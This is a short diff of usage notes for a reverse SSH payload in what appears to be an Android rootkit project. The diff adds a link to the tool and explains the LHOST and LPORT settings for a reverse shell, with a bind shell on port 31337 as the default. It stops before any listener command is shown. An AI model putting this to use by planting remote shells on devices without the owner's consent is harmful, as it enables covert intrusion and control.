ng-dst/flashable-android-rootkit/revshell/Payloads.md

 #### Reverse SSH

-This payload ([link]()) has better compatibility with Android and seems to work reliably, though it might be a bit tricky to use.
+This payload ([link](https://github.com/Fahrj/reverse-ssh)) has better compatibility with Android and seems to work reliably, though it might be a bit tricky to use.
 `upx_reverse-ssh-armv8-x64` version is recommended.

-Set LHOST and LPORT in `config.prop`.
+For reverse shell, set LHOST and LPORT in `config.prop`.
+Otherwise it will act as bind shell (default port: 31337).

 Launch _ReverseSSH_ listener on attacker machine:
 ```